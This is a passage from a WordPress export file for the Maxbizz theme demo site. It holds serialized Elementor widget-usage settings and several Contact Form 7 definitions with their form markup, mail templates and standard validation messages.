:1;s:20:"reverse_order_mobile";i:1;}}}}s:8:"iheading";a:3:{s:5:"count";i:8;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:8;s:5:"title";i:8;s:11:"header_size";i:6;s:5:"align";i:5;}}s:8:"advanced";a:1:{s:14:"_section_style";a:4:{s:8:"_padding";i:5;s:7:"_margin";i:2;s:14:"_margin_mobile";i:1;s:14:"_margin_tablet";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:9:{s:9:"stitle_bg";i:5;s:27:"title_typography_typography";i:5;s:33:"title_typography_font_size_mobile";i:5;s:28:"stitle_typography_typography";i:8;s:27:"stitle_typography_font_size";i:8;s:12:"stitle_color";i:4;s:29:"stitle_typography_font_weight";i:8;s:11:"title_color";i:4;s:19:"stitle_bottom_space";i:1;}}}}s:9:"iiconbox1";a:3:{s:5:"count";i:3;s:15:"control_percent";i:7;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:5:{s:9:"icon_font";i:3;s:5:"title";i:3;s:3:"des";i:3;s:8:"btn_text";i:3;s:4:"link";i:3;}}s:5:"style";a:3:{s:18:"style_icon_section";a:6:{s:9:"is_border";i:3;s:9:"icon_size";i:3;s:7:"icon_bg";i:3;s:10:"icon_color";i:3;s:12:"circle_color";i:3;s:9:"dot_color";i:3;}s:21:"style_content_section";a:5:{s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:11:"title_color";i:3;s:9:"des_color";i:3;s:14:"link_btn_color";i:2;}s:17:"style_box_section";a:5:{s:7:"is_line";i:3;s:6:"bg_box";i:3;s:13:"circle_hcolor";i:1;s:30:"box_box_shadow_box_shadow_type";i:3;s:25:"box_box_shadow_box_shadow";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:14:"_margin_tablet";i:3;s:14:"_margin_mobile";i:1;}}}}s:7:"iclogos";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:14:"image_carousel";i:1;s:5:"tshow";i:1;s:12:"tshow_tablet";i:1;s:4:"dots";i:1;}}s:5:"style";a:1:{s:19:"image_style_section";a:3:{s:11:"img_spacing";i:1;s:32:"img_css_filters_hover_css_filter";i:1;s:32:"img_css_filters_hover_brightness";i:1;}}s:8:"advanced";a:1:{s:15:"_section_border";a:1:{s:14:"_border_radius";i:1;}}}}s:9:"itabtitle";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:11:"title_boxes";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:4:{s:12:"radius_title";i:1;s:8:"title_bg";i:1;s:18:"title_active_color";i:1;s:15:"title_active_bg";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:4:{s:5:"image";i:6;s:10:"image_size";i:6;s:5:"align";i:2;s:12:"align_tablet";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:3:{s:32:"image_box_shadow_box_shadow_type";i:3;s:27:"image_box_shadow_box_shadow";i:3;s:19:"image_border_radius";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:2;s:14:"_margin_tablet";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:6;s:15:"control_percent";i:8;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:5:{s:13:"selected_icon";i:6;s:10:"title_text";i:6;s:16:"description_text";i:6;s:8:"position";i:6;s:10:"title_size";i:6;}}s:5:"style";a:2:{s:18:"section_style_icon";a:4:{s:13:"primary_color";i:6;s:10:"icon_space";i:6;s:9:"icon_size";i:6;s:6:"rotate";i:6;}s:21:"section_style_content";a:11:{s:18:"title_bottom_space";i:6;s:11:"title_color";i:6;s:27:"title_typography_typography";i:6;s:28:"title_typography_font_family";i:6;s:28:"title_typography_line_height";i:6;s:17:"description_color";i:6;s:33:"description_typography_typography";i:6;s:34:"description_typography_font_family";i:6;s:34:"description_typography_font_weight";i:6;s:26:"title_typography_font_size";i:6;s:17:"text_align_mobile";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:6;}}}}s:7:"ibutton";a:3:{s:5:"count";i:5;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"button_section";a:4:{s:4:"text";i:5;s:5:"align";i:2;s:4:"link";i:2;s:12:"align_mobile";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:4:{s:6:"btn_bg";i:2;s:29:"button_background_hover_color";i:2;s:17:"button_text_color";i:1;s:11:"hover_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:14:"_margin_mobile";i:1;}}}}s:11:"iaccordions";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_accs";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_tablet";i:1;}}s:5:"style";a:2:{s:11:"style_title";a:3:{s:8:"bg_title";i:1;s:12:"title_border";i:1;s:11:"title_color";i:1;}s:13:"style_content";a:1:{s:13:"content_color";i:1;}}}}s:8:"ipfilter";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:6:"filter";i:1;s:6:"column";i:1;s:11:"project_num";i:1;s:9:"load_more";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}s:5:"style";a:1:{s:21:"overlay_style_section";a:4:{s:13:"overlay_align";i:1;s:8:"position";i:1;s:18:"overlay_background";i:1;s:9:"show_icon";i:1;}}}}s:9:"iiconbox2";a:3:{s:5:"count";i:8;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"icon_font";i:8;s:5:"title";i:8;s:3:"des";i:8;}}s:5:"style";a:3:{s:17:"style_box_section";a:5:{s:7:"is_line";i:8;s:10:"line_color";i:8;s:16:"hiver_line_color";i:8;s:10:"icon_color";i:8;s:7:"icon_bg";i:8;}s:18:"style_icon_section";a:5:{s:10:"icon_space";i:8;s:9:"icon_size";i:8;s:10:"radius_box";i:8;s:27:"icon_shadow_box_shadow_type";i:8;s:22:"icon_shadow_box_shadow";i:8;}s:21:"style_content_section";a:4:{s:27:"title_typography_typography";i:8;s:28:"title_typography_font_family";i:8;s:26:"title_typography_font_size";i:8;s:28:"title_typography_font_weight";i:8;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:14:"_margin_mobile";i:3;}}}}s:14:"itestimonials2";a:3:{s:5:"count";i:1;s:15:"control_percent";i:8;s:8:"controls";a:2:{s:7:"content";a:1:{s:20:"section_testimonials";a:5:{s:12:"testi_slider";i:1;s:4:"loop";i:1;s:6:"arrows";i:1;s:11:"arrow_align";i:1;s:4:"dots";i:1;}}s:5:"style";a:3:{s:13:"style_general";a:3:{s:14:"tcontent_color";i:1;s:29:"content_typography_typography";i:1;s:35:"content_typography_font_size_mobile";i:1;}s:11:"style_tinfo";a:7:{s:10:"name_color";i:1;s:26:"name_typography_typography";i:1;s:25:"name_typography_font_size";i:1;s:27:"name_typography_font_weight";i:1;s:25:"job_typography_typography";i:1;s:24:"job_typography_font_size";i:1;s:26:"job_typography_font_weight";i:1;}s:9:"style_nav";a:6:{s:13:"arrow_spacing";i:1;s:20:"arrow_spacing_tablet";i:1;s:20:"arrow_spacing_mobile";i:1;s:11:"arrow_color";i:1;s:14:"arrow_bg_color";i:1;s:15:"arrow_bg_hcolor";i:1;}}}}s:7:"imember";a:3:{s:5:"count";i:4;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:12:"member_image";i:4;s:11:"member_name";i:3;s:12:"member_extra";i:3;s:12:"social_share";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:10:"info_style";a:5:{s:27:"title_typography_typography";i:4;s:26:"title_typography_font_size";i:4;s:25:"job_typography_typography";i:4;s:24:"job_typography_font_size";i:4;s:28:"title_typography_font_weight";i:4;}}}}s:9:"icounter2";a:3:{s:5:"count";i:4;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:9:"icon_font";i:4;s:5:"title";i:4;s:6:"number";i:4;s:12:"after_number";i:2;}}s:5:"style";a:1:{s:21:"style_content_section";a:9:{s:10:"icon_space";i:4;s:10:"icon_color";i:4;s:12:"number_color";i:4;s:28:"number_typography_typography";i:4;s:29:"number_typography_font_family";i:4;s:27:"number_typography_font_size";i:4;s:11:"title_space";i:4;s:11:"title_color";i:4;s:29:"number_typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:14:"_margin_tablet";i:2;}}}}s:13:"ipostcarousel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:8:"post_num";i:1;s:4:"dots";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Main Contact</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/?post_type=wpcf7_contact_form&#038;p=1319</link>
		<pubDate>Thu, 03 Sep 2020 08:30:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=wpcf7_contact_form&#038;p=4</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="main-form">
<h4>Ready to Get Started?</h4>
<div class="row">
<p class="col-md-6">[text* your-name placeholder "Your Name *"]</p>
<p class="col-md-6">[email* your-email placeholder "Your Email *"]</p>
</div>
<p>[text your-site placeholder "Website"]</p>
<p>[textarea your-message placeholder "Message..."]</p>
<button type="submit" class="octf-btn wpcf7-submit">Send Message</button>
</div>
1
Maxbizz "[your-subject]"
Maxbizz <wordpress@wpdemo.archiwp.com>
support@oceanthemes.net
From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: [your-email]




Maxbizz "[your-subject]"
Maxbizz <wordpress@wpdemo.archiwp.com>
[your-email]
Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: support@oceanthemes.net



Thank you for your message. It has been sent.
There was an error trying to send your message. Please try again later.
One or more fields have an error. Please check and try again.
There was an error trying to send your message. Please try again later.
You must accept the terms and conditions before sending your message.
The field is required.
The field is too long.
The field is too short.
The date format is incorrect.
The date is before the earliest one allowed.
The date is after the latest one allowed.
There was an unknown error uploading the file.
You are not allowed to upload files of this type.
The file is too big.
There was an error uploading the file.
The number format is invalid.
The number is smaller than the minimum allowed.
The number is larger than the maximum allowed.
The answer to the quiz is incorrect.
The e-mail address entered is invalid.
The URL is invalid.
The telephone number is invalid.]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1319</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 08:30:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 08:30:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[contact-form-1-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[wpcf7_contact_form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_form]]></wp:meta_key>
		<wp:meta_value><![CDATA[<div class="main-form">
<h4>Ready to Get Started?</h4>
<div class="row">
<p class="col-md-6">[text* your-name placeholder "Your Name *"]</p>
<p class="col-md-6">[email* your-email placeholder "Your Email *"]</p>
</div>
<p>[text your-site placeholder "Website"]</p>
<p>[textarea your-message placeholder "Message..."]</p>
<button type="submit" class="octf-btn wpcf7-submit">Send Message</button>
</div>]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:1;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:23:"support@oceanthemes.net";s:4:"body";s:179:"From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:22:"Reply-To: [your-email]";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail_2]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:0;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:12:"[your-email]";s:4:"body";s:121:"Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:33:"Reply-To: support@oceanthemes.net";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_messages]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:22:{s:12:"mail_sent_ok";s:45:"Thank you for your message. It has been sent.";s:12:"mail_sent_ng";s:71:"There was an error trying to send your message. Please try again later.";s:16:"validation_error";s:61:"One or more fields have an error. Please check and try again.";s:4:"spam";s:71:"There was an error trying to send your message. Please try again later.";s:12:"accept_terms";s:69:"You must accept the terms and conditions before sending your message.";s:16:"invalid_required";s:22:"The field is required.";s:16:"invalid_too_long";s:22:"The field is too long.";s:17:"invalid_too_short";s:23:"The field is too short.";s:12:"invalid_date";s:29:"The date format is incorrect.";s:14:"date_too_early";s:44:"The date is before the earliest one allowed.";s:13:"date_too_late";s:41:"The date is after the latest one allowed.";s:13:"upload_failed";s:46:"There was an unknown error uploading the file.";s:24:"upload_file_type_invalid";s:49:"You are not allowed to upload files of this type.";s:21:"upload_file_too_large";s:20:"The file is too big.";s:23:"upload_failed_php_error";s:38:"There was an error uploading the file.";s:14:"invalid_number";s:29:"The number format is invalid.";s:16:"number_too_small";s:47:"The number is smaller than the minimum allowed.";s:16:"number_too_large";s:46:"The number is larger than the maximum allowed.";s:23:"quiz_answer_not_correct";s:36:"The answer to the quiz is incorrect.";s:13:"invalid_email";s:38:"The e-mail address entered is invalid.";s:11:"invalid_url";s:19:"The URL is invalid.";s:11:"invalid_tel";s:32:"The telephone number is invalid.";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_additional_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_locale]]></wp:meta_key>
		<wp:meta_value><![CDATA[en_US]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Bottom Homepage Form</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/?post_type=wpcf7_contact_form&#038;p=4</link>
		<pubDate>Fri, 13 Nov 2020 07:02:55 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/?post_type=wpcf7_contact_form&#038;p=4</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="main-form">
<div class="row">
<p class="col-md-6">[text* your-name placeholder "Your Name *"]</p>
<p class="col-md-6">[email* your-email placeholder "Your Email *"]</p>
</div>
<div class="row">
<p class="col-md-6">[text your-phone placeholder "Your Phone *"]</p>
<p class="col-md-6">[text your-subject placeholder "Subject *"]</p>
</div>
<p>[textarea your-message placeholder "Message..."]</p>
<button type="submit" class="octf-btn wpcf7-submit">submit now</button>
</div>
1
[_site_title] "[your-subject]"
[_site_title] <wordpress@wpdemo.archiwp.com>
[_site_admin_email]
From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on [_site_title] ([_site_url])
Reply-To: [your-email]




[_site_title] "[your-subject]"
[_site_title] <wordpress@wpdemo.archiwp.com>
[your-email]
Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on [_site_title] ([_site_url])
Reply-To: [_site_admin_email]



Thank you for your message. It has been sent.
There was an error trying to send your message. Please try again later.
One or more fields have an error. Please check and try again.
There was an error trying to send your message. Please try again later.
You must accept the terms and conditions before sending your message.
The field is required.
The field is too long.
The field is too short.
The date format is incorrect.
The date is before the earliest one allowed.
The date is after the latest one allowed.
There was an unknown error uploading the file.
You are not allowed to upload files of this type.
The file is too big.
There was an error uploading the file.
The number format is invalid.
The number is smaller than the minimum allowed.
The number is larger than the maximum allowed.
The answer to the quiz is incorrect.
The e-mail address entered is invalid.
The URL is invalid.
The telephone number is invalid.]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>4</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:02:55]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:02:55]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[contact-form-1]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[wpcf7_contact_form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_form]]></wp:meta_key>
		<wp:meta_value><![CDATA[<div class="main-form">
<div class="row">
<p class="col-md-6">[text* your-name placeholder "Your Name *"]</p>
<p class="col-md-6">[email* your-email placeholder "Your Email *"]</p>
</div>
<div class="row">
<p class="col-md-6">[text your-phone placeholder "Your Phone *"]</p>
<p class="col-md-6">[text your-subject placeholder "Subject *"]</p>
</div>
<p>[textarea your-message placeholder "Message..."]</p>
<button type="submit" class="octf-btn wpcf7-submit">submit now</button>
</div>]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:1;s:7:"subject";s:30:"[_site_title] "[your-subject]"";s:6:"sender";s:44:"[_site_title] <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:19:"[_site_admin_email]";s:4:"body";s:163:"From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on [_site_title] ([_site_url])";s:18:"additional_headers";s:22:"Reply-To: [your-email]";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail_2]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:0;s:7:"subject";s:30:"[_site_title] "[your-subject]"";s:6:"sender";s:44:"[_site_title] <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:12:"[your-email]";s:4:"body";s:105:"Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on [_site_title] ([_site_url])";s:18:"additional_headers";s:29:"Reply-To: [_site_admin_email]";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_messages]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:22:{s:12:"mail_sent_ok";s:45:"Thank you for your message. It has been sent.";s:12:"mail_sent_ng";s:71:"There was an error trying to send your message. Please try again later.";s:16:"validation_error";s:61:"One or more fields have an error. Please check and try again.";s:4:"spam";s:71:"There was an error trying to send your message. Please try again later.";s:12:"accept_terms";s:69:"You must accept the terms and conditions before sending your message.";s:16:"invalid_required";s:22:"The field is required.";s:16:"invalid_too_long";s:22:"The field is too long.";s:17:"invalid_too_short";s:23:"The field is too short.";s:12:"invalid_date";s:29:"The date format is incorrect.";s:14:"date_too_early";s:44:"The date is before the earliest one allowed.";s:13:"date_too_late";s:41:"The date is after the latest one allowed.";s:13:"upload_failed";s:46:"There was an unknown error uploading the file.";s:24:"upload_file_type_invalid";s:49:"You are not allowed to upload files of this type.";s:21:"upload_file_too_large";s:20:"The file is too big.";s:23:"upload_failed_php_error";s:38:"There was an error uploading the file.";s:14:"invalid_number";s:29:"The number format is invalid.";s:16:"number_too_small";s:47:"The number is smaller than the minimum allowed.";s:16:"number_too_large";s:46:"The number is larger than the maximum allowed.";s:23:"quiz_answer_not_correct";s:36:"The answer to the quiz is incorrect.";s:13:"invalid_email";s:38:"The e-mail address entered is invalid.";s:11:"invalid_url";s:19:"The URL is invalid.";s:11:"invalid_tel";s:32:"The telephone number is invalid.";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_additional_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_locale]]></wp:meta_key>
		<wp:meta_value><![CDATA[en_US]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Subscribe Form</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/?post_type=wpcf7_contact_form&#038;p=741</link>
		<pubDate>Thu, 10 Sep 2020 08:29:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=wpcf7_contact_form&#038;p=741</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="team-form flex-middle">
[text* your-name placeholder "Your Name *"]
[email* your-email placeholder "Your Email *"]
<button type="submit" class="octf-btn">Subscribe Now</button>
</div>
1
Maxbizz "[your-subject]"
Maxbizz 
support@oceanthemes.net
From: [your-name] 
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: [your-email]




Maxbizz "[your-subject]"
Maxbizz 
[your-email]
Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: support@oceanthemes.net



Thank you for your message. It has been sent.
There was an error trying to send your message. Please try again later.
One or more fields have an error. Please check and try again.
There was an error trying to send your message. Please try again later.
You must accept the terms and conditions before sending your message.
The field is required.
The field is too long.
The field is too short.
The date format is incorrect.
The date is before the earliest one allowed.
The date is after the latest one allowed.
There was an unknown error uploading the file.
You are not allowed to upload files of this type.
The file is too big.
There was an error uploading the file.
The number format is invalid.
The number is smaller than the minimum allowed.
The number is larger than the maximum allowed.
The answer to the quiz is incorrect.
The e-mail address entered is invalid.
The URL is invalid.
The telephone number is invalid.]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>741</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 08:29:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 08:29:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-team-form]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[wpcf7_contact_form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_form]]></wp:meta_key>
		<wp:meta_value><![CDATA[<div class="team-form flex-middle">
[text* your-name placeholder "Your Name *"]
[email* your-email placeholder "Your Email *"]
<button type="submit" class="octf-btn">Subscribe Now</button>
</div>]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:1;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:23:"support@oceanthemes.net";s:4:"body";s:179:"From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:22:"Reply-To: [your-email]";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail_2]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:0;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:12:"[your-email]";s:4:"body";s:121:"Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:33:"Reply-To: support@oceanthemes.net";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_messages]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:22:{s:12:"mail_sent_ok";s:45:"Thank you for your message. It has been sent.";s:12:"mail_sent_ng";s:71:"There was an error trying to send your message. Please try again later.";s:16:"validation_error";s:61:"One or more fields have an error. Please check and try again.";s:4:"spam";s:71:"There was an error trying to send your message. Please try again later.";s:12:"accept_terms";s:69:"You must accept the terms and conditions before sending your message.";s:16:"invalid_required";s:22:"The field is required.";s:16:"invalid_too_long";s:22:"The field is too long.";s:17:"invalid_too_short";s:23:"The field is too short.";s:12:"invalid_date";s:29:"The date format is incorrect.";s:14:"date_too_early";s:44:"The date is before the earliest one allowed.";s:13:"date_too_late";s:41:"The date is after the latest one allowed.";s:13:"upload_failed";s:46:"There was an unknown error uploading the file.";s:24:"upload_file_type_invalid";s:49:"You are not allowed to upload files of this type.";s:21:"upload_file_too_large";s:20:"The file is too big.";s:23:"upload_failed_php_error";s:38:"There was an error uploading the file.";s:14:"invalid_number";s:29:"The number format is invalid.";s:16:"number_too_small";s:47:"The number is smaller than the minimum allowed.";s:16:"number_too_large";s:46:"The number is larger than the maximum allowed.";s:23:"quiz_answer_not_correct";s:36:"The answer to the quiz is incorrect.";s:13:"invalid_email";s:38:"The e-mail address entered is invalid.";s:11:"invalid_url";s:19:"The URL is invalid.";s:11:"invalid_tel";s:32:"The telephone number is invalid.";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_additional_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_locale]]></wp:meta_key>
		<wp:meta_value><![CDATA[en_US]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Banner Form</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/?post_type=wpcf7_contact_form&#038;p=1536</link>
		<pubDate>Fri, 16 Oct 2020 09:36:55 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/?post_type=wpcf7_contact_form&#038;p=4</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="main-form">
<p>[text* your-name placeholder "Your Name *"]</p>
<p>[email* your-email placeholder "Your Email *"]</p>
<p>[email* your-phone placeholder "Your Phone *"]</p>
<p>[email* your-subject placeholder "Message..."]</p>
<p><button type="submit" class="octf-btn">submit now</button></p>
</div>
1
Maxbizz Consulting "[your-subject]"
Maxbizz Consulting <wordpress@wpdemo.archiwp.com>
support@oceanthemes.net
From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz Consulting (http://wpdemo.archiwp.com/maxbizz-consulting)
Reply-To: [your-email]




Maxbizz Consulting "[your-subject]"
Maxbizz Consulting <wordpress@wpdemo.archiwp.com>
[your-email]
Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz Consulting (http://wpdemo.archiwp.com/maxbizz-consulting)
Reply-To: support@oceanthemes.net



Thank you for your message. It has been sent.
There was an error trying to send your message. Please try again later.
One or more fields have an error. Please check and try again.
There was an error trying to send your message. Please try again later.
You must accept the terms and conditions before sending your message.
The field is required.
The field is too long.
The field is too short.
The date format is incorrect.
The date is before the earliest one allowed.
The date is after the latest one allowed.
There was an unknown error uploading the file.
